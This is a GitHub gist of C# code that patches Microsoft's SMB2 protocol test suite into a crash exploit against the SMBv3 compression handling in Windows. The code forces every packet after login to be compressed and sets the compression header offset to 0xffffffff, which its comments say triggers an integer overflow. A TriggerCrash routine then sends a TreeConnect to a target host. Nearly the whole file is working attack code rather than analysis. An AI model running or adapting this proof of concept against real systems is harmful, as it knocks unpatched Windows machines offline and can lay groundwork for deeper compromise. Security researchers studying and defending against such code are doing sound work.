Created
March 13, 2020 03:20
-
-
Save potats0/62562988941b3c7c035496b57247f8c6 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// .\WindowsProtocolTestSuites\ProtoSDK\MS-SMB2\Common\Smb2Compression.cs | |
namespace Microsoft.Protocols.TestTools.StackSdk.FileAccessService.Smb2.Common | |
{ | |
/// <summary> | |
/// SMB2 Compression Utility. | |
/// </summary> | |
public static class Smb2Compression | |
{ | |
private static uint i = 0; | |
/// <summary> | |
/// Compress SMB2 packet. | |
/// </summary> | |
/// <param name="packet">The SMB2 packet.</param> | |
/// <param name="compressionInfo">Compression info.</param> | |
/// <param name="role">SMB2 role.</param> | |
/// <param name="offset">The offset where compression start, default zero.</param> | |
/// <returns></returns> | |
public static Smb2Packet Compress(Smb2CompressiblePacket packet, Smb2CompressionInfo compressionInfo, Smb2Role role, uint offset = 0) | |
{ | |
var compressionAlgorithm = GetCompressionAlgorithm(packet, compressionInfo, role); | |
/*if (compressionAlgorithm == CompressionAlgorithm.NONE) | |
{ | |
return packet; | |
}*/ | |
// HACK: shitty counter to force Smb2Compression to not compress the first three packets (NEGOTIATE + SSPI login) | |
if (i < 3) | |
{ | |
i++; | |
return packet; | |
} | |
var packetBytes = packet.ToBytes(); | |
var compressor = GetCompressor(compressionAlgorithm); | |
// HACK: Insane length to trigger the integrer overflow | |
offset = 0xffffffff; | |
var compressedPacket = new Smb2CompressedPacket(); | |
compressedPacket.Header.ProtocolId = Smb2Consts.ProtocolIdInCompressionTransformHeader; | |
compressedPacket.Header.OriginalCompressedSegmentSize = (uint)packetBytes.Length; | |
compressedPacket.Header.CompressionAlgorithm = compressionAlgorithm; | |
compressedPacket.Header.Reserved = 0; | |
compressedPacket.Header.Offset = offset; | |
compressedPacket.UncompressedData = packetBytes.Take((int)offset).ToArray(); | |
compressedPacket.CompressedData = compressor.Compress(packetBytes.Skip((int)offset).ToArray()); | |
var compressedPackectBytes = compressedPacket.ToBytes(); | |
// HACK: force compressed packet to be sent | |
return compressedPacket; | |
// Check whether compression shrinks the on-wire packet size | |
// if (compressedPackectBytes.Length < packetBytes.Length) | |
// { | |
// compressedPacket.OriginalPacket = packet; | |
// return compressedPacket; | |
// } | |
// else | |
// { | |
// return packet; | |
// } | |
} | |
} | |
} | |
namespace Microsoft.Protocols.TestManager.BranchCachePlugin | |
{ | |
class Program | |
{ | |
static void TriggerCrash(BranchCacheDetector bcd, DetectionInfo info) | |
{ | |
Smb2Client client = new Smb2Client(new TimeSpan(0, 0, defaultTimeoutInSeconds)); | |
client.CompressionInfo.CompressionIds = new CompressionAlgorithm[] { CompressionAlgorithm.LZ77 }; | |
// NEGOTIATION is done in "plaintext", this is the call within UserLogon: | |
// client.Negotiate( | |
// 0, | |
// 1, | |
// Packet_Header_Flags_Values.NONE, | |
// messageId++, | |
// new DialectRevision[] { DialectRevision.Smb311 }, | |
// SecurityMode_Values.NEGOTIATE_SIGNING_ENABLED, | |
// Capabilities_Values.NONE, | |
// clientGuid, | |
// out selectedDialect, | |
// out gssToken, | |
// out header, | |
// out negotiateResp, | |
// preauthHashAlgs: new PreauthIntegrityHashID[] { PreauthIntegrityHashID.SHA_512 }, // apprently mandatory for compression | |
// compressionAlgorithms: new CompressionAlgorithm[] { CompressionAlgorithm.LZ77 } | |
// ); | |
if (!bcd.UserLogon(info, client, out messageId, out sessionId, out clientGuid, out negotiateResp)) | |
return; | |
// From now on, we compress every new packet | |
client.CompressionInfo.CompressAllPackets = true; | |
// Get tree information about a remote share (which does not exists) | |
TREE_CONNECT_Response treeConnectResp; | |
string uncSharePath = Smb2Utility.GetUncPath(info.ContentServerName, defaultShare); | |
// trigger crash here | |
client.TreeConnect( | |
1, | |
1, | |
Packet_Header_Flags_Values.FLAGS_SIGNED, | |
messageId++, | |
sessionId, | |
uncSharePath, | |
out treeId, | |
out header, | |
out treeConnectResp | |
); | |
} | |
static void Main(string[] args) | |
{ | |
Console.WriteLine("Hello World!"); | |
Logger logger = new Logger(); | |
AccountCredential accountCredential = new AccountCredential("", "Ghost", "Ghost"); | |
BranchCacheDetector bcd = new BranchCacheDetector( | |
logger, | |
"DESKTOP-SMBVULN", | |
"DESKTOP-SMBVULN", | |
accountCredential | |
); | |
DetectionInfo info = new DetectionInfo(); | |
info.SelectedTransport = "SMB2"; | |
info.ContentServerName = "DESKTOP-SMBVULN"; | |
info.UserName = "Ghost"; | |
info.Password = "Ghost"; | |
TriggerCrash(bcd,info); | |
Console.WriteLine("Goodbye World!"); | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment